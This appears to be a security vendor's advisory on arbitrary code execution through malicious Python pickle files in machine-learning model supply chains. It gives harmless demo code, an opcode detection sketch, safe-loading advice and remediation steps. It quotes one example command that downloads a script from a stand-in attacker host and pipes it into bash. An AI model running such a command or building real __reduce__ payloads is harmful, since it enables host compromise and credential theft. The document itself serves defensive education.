Deserialization Threats

Python Pickle Arbitrary Code Execution Detected

Eresus Security Research Team, Security Researcher
April 10, 2026
4 min read

Overview

Python’s pickle module is the de facto standard for serializing (saving) and deserializing (loading) complex object structures. In modern machine learning, it is frequently used to store model weights, training configurations, and pipeline state (commonly seen as .pkl, .bin, .pt, or .pth files).

However, pickle is inherently insecure by design. The Python documentation explicitly warns that unpickling data from an untrusted source can lead to Arbitrary Code Execution (ACE) and Remote Code Execution (RCE). A pickle file is not passive data: it is a program for a small stack-based virtual machine, and deserializing it executes that program's opcodes, which can import modules and invoke arbitrary callables.

If Eresus Sentinel flags a PAIT-PKL-100 vulnerability in your ML pipeline, it has detected a weaponized pickle payload: one whose serialized instructions invoke a callable (typically via __reduce__) to execute raw system commands the moment the file is loaded.

The Role of __reduce__ in Exploitation

To weaponize a pickle file, threat actors leverage Python's __reduce__ magic method. When an object defines __reduce__, it tells pickle.load() exactly how to reconstruct the object: it returns a callable together with the arguments to call it with. An attacker can craft a class whose __reduce__ returns the os.system callable alongside a shell command (e.g., wget -qO- http://malicious-c2.com/malware.sh | bash).

The moment a data scientist or a production server calls pickle.load(file), the payload executes natively with the exact privileges of the host process, bypassing standard API security gateways entirely.
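The mechanism can be sketched in a few lines. This is a deliberately harmless illustration (the "payload" evaluates an arithmetic expression rather than running a shell command), but the structure is identical to a real exploit:

```python
import pickle

class Malicious:
    """Illustration only: __reduce__ tells pickle how to rebuild this object.

    It returns a (callable, args) pair, and pickle.loads() invokes the
    callable during deserialization. A real payload would return
    (os.system, ("<shell command>",)) instead of a harmless eval.
    """
    def __reduce__(self):
        return (eval, ("6 * 7",))  # runs as soon as the data is unpickled

payload = pickle.dumps(Malicious())

# No method is ever called on the object; loading alone triggers execution.
result = pickle.loads(payload)
print(result)  # → 42
```

Note that the deserialized "object" is not a Malicious instance at all: it is whatever the callable returned, which is why loading a poisoned model can both run code and hand back plausible-looking data.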

How The Attack Works

Cybercriminals upload poisoned .pkl or .pt files to public model repositories (like Hugging Face) masquerading as standard pre-trained models. A victim downloads the model, trusting its origin, and attempts to load it into their PyTorch or scikit-learn environment.

sequenceDiagram
    participant Attacker
    participant File_System as File / Repository
    participant MLOps_Engineer as Victim (MLOps)
    participant Python_VM as Python Interpreter
    participant OS as Host OS

    Attacker->>File_System: Creates payload returning 'os.system' via __reduce__
    Attacker->>File_System: Uploads malicious.pkl masquerading as an ML model
    MLOps_Engineer->>File_System: Downloads malicious.pkl
    MLOps_Engineer->>Python_VM: Executes 'pickle.load()'
    Python_VM->>OS: Deserializes opcodes & calls 'os.system(malicious_script)'
    OS-->>Attacker: Reverse shell established / Database exfiltrated

Key Points

  • Zero-Click Execution: The victim does not need to run a specific setup script. Simply loading the model to inspect its weights is enough to detonate the malware.
  • Deep Supply Chain Risk: Because ML frameworks historically relied on pickle by default (such as earlier versions of PyTorch), the entire industry is exposed to legacy model poisoning.
  • Evades Traditional Antivirus: The malicious logic is encoded as pickle-specific opcodes rather than a recognizable executable, so standard endpoint detection and response (EDR) software rarely flags .pkl files as malware.
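Because the payload lives in opcodes, it can also be detected at the opcode level without ever loading the file. A minimal sketch using the standard library's pickletools, which disassembles a pickle stream without executing any of it:

```python
import io
import pickle
import pickletools

class Evil:
    """Stand-in payload for the demo; a real one would call os.system."""
    def __reduce__(self):
        return (eval, ("1 + 1",))

data = pickle.dumps(Evil(), protocol=0)  # protocol 0 keeps opcodes readable

# Disassemble the stream; nothing in it is executed.
buf = io.StringIO()
pickletools.dis(data, out=buf)
listing = buf.getvalue()

# A GLOBAL import followed by REDUCE is the classic code-execution signature.
suspicious = "GLOBAL" in listing and "REDUCE" in listing
print(suspicious)  # → True
```

Real scanners must also handle the newer STACK_GLOBAL opcode used by protocols 2 and above, but the principle is the same: static opcode analysis, never deserialization.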

Impact

Loading a malicious pickle file grants the attacker exactly the same permissions as the process running the Python script. On a data scientist's local workstation, this means full access to the filesystem, AWS/GCP keys, and internal VPNs. On a deployed production server, it enables immediate host takeover, lateral movement across the Kubernetes cluster, and mass exfiltration of proprietary training data.

Best Practices for ML Serialization

To fortify your artificial intelligence workflows against deserialization exploits:

  • Abandon Pickle for Weights: Migrate your infrastructure away from pickle. Utilize static, data-only formats such as Safetensors or ONNX, which explicitly prevent arbitrary code execution by storing only mathematical tensors.
  • Use Trusted Hubs: Only download models from definitively trusted authors and organizations. Use cryptographic signatures to verify model provenance.
  • Sandboxed Loading: If you absolutely must initialize an unknown legacy .pkl file, do so in an ephemeral Docker container devoid of internet access and IAM permissions.
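When a legacy .pkl file truly must be loaded, the Python documentation's recommended hardening is to restrict which globals the unpickler may import by overriding Unpickler.find_class. A minimal sketch; the ALLOWED set here is a hypothetical example, and you would tailor it to the types your models actually contain:

```python
import io
import pickle

# Hypothetical allow-list: only these (module, name) pairs may be imported.
ALLOWED = {
    ("collections", "OrderedDict"),
}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the stream tries to import.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(
                f"blocked global during unpickling: {module}.{name}"
            )
        return super().find_class(module, name)

def safe_loads(data: bytes):
    return SafeUnpickler(io.BytesIO(data)).load()

# Plain containers need no global imports, so they load fine...
print(safe_loads(pickle.dumps({"weights": [0.1, 0.2]})))

# ...but a __reduce__ payload is rejected before any code runs.
import os

class Evil:
    def __reduce__(self):
        return (os.system, ("true",))

try:
    safe_loads(pickle.dumps(Evil()))
except pickle.UnpicklingError as exc:
    print(exc)
```

This is a mitigation, not a cure: an allow-listed class with a dangerous constructor can still be abused, which is why migrating to Safetensors remains the primary recommendation.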

Remediation

If Eresus Sentinel detects PAIT-PKL-100, immediately isolate the host environment. Delete the flagged .pkl file from all storage buckets and local developer machines. Conduct a forensic review to determine whether the payload triggered outbound network traffic or accessed .env credential files. Permanently replace the model with a Safetensors equivalent.

📥 Eresus Sentinel Scans Pickle Files Before They Detonate

With Eresus Sentinel, you can actively scan legacy .pkl, .bin, and .pt files for concealed __reduce__ payloads before your ML developers load them. Stop zero-click execution attacks instantly and enforce secure ML protocols.

Learn more | Book a Demo